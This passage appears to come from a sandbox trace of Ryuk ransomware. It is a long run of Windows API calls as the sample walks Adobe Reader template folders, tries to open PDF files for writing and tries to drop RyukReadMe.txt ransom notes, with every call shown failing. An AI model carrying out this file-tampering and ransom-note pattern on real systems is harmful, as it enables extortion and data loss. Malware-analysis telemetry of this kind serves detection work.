(lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.345] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.345] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.345] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.345] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.345] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.346] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.346] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.346] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.346] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.346] SetLastError (dwErrCode=0x0) [0138.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.346] GetLastError () returned 0x5 [0138.346] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.346] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.346] SetLastError (dwErrCode=0x0) [0138.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.347] GetLastError () returned 0x5 [0138.347] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.347] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.347] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.347] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.347] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.347] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.348] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.348] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.348] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.348] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.348] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.348] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.348] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.348] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.348] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.349] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.349] SetLastError (dwErrCode=0x0) [0138.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.349] GetLastError () returned 0x5 [0138.349] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.349] SetLastError (dwErrCode=0x0) [0138.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.349] GetLastError () returned 0x5 [0138.349] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.349] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.349] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.349] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.349] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.349] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.349] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.350] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.350] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.350] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.350] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.350] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.350] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.350] SetLastError (dwErrCode=0x0) [0138.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.351] GetLastError () returned 0x5 [0138.351] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.351] SetLastError (dwErrCode=0x0) [0138.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.351] GetLastError () returned 0x5 [0138.351] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.351] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.351] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.352] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.352] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.352] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.352] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.352] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.352] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.352] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.353] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.353] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.353] SetLastError (dwErrCode=0x0) [0138.353] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.353] GetLastError () returned 0x5 [0138.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.353] SetLastError (dwErrCode=0x0) [0138.353] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.353] GetLastError () returned 0x5 [0138.353] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.353] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.353] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.354] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.354] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.354] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.354] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.354] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.354] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.355] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.355] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.355] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.355] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.355] SetLastError (dwErrCode=0x0) [0138.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.355] GetLastError () returned 0x5 [0138.355] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.355] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.355] SetLastError (dwErrCode=0x0) [0138.355] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.356] GetLastError () returned 0x5 [0138.356] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.356] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.356] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.356] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.356] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.356] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.356] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.357] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.357] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.357] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.357] SetLastError (dwErrCode=0x0) [0138.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.357] GetLastError () returned 0x5 [0138.357] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.357] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.357] SetLastError (dwErrCode=0x0) [0138.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.357] GetLastError () returned 0x5 [0138.357] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.358] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.358] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.358] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.358] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.358] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf", dwFileAttributes=0x80) returned 0 [0138.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\adobeid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.358] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.358] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.358] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.359] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\DefaultID.pdf", dwFileAttributes=0x80) returned 0 [0138.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\defaultid.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.359] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.359] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.359] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.360] SetLastError (dwErrCode=0x0) [0138.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.360] GetLastError () returned 0x5 [0138.360] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.360] SetLastError (dwErrCode=0x0) [0138.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.360] GetLastError () returned 0x5 [0138.360] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.360] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.360] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.361] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.361] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.361] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.361] SetFileAttributesW 